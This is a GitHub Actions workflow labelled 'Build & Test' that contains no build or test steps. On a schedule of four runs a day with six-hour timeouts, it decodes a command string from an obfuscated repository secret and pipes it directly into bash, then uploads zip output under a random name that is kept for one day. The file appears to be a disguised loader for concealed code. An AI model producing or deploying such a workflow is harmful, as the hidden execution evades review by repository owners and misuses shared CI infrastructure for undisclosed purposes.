name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '24 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  main:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Process
        env:
          omj7673: ${{ secrets.omj7673 }}
        run: |
          printf '%s' "$omj7673" | jq -r .szztm5 | /bin/bash
          printf '%s' "$idg0969" | jq -r .qce29 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: zYjiBhpD
          path: "*.zip"
          retention-days: 1
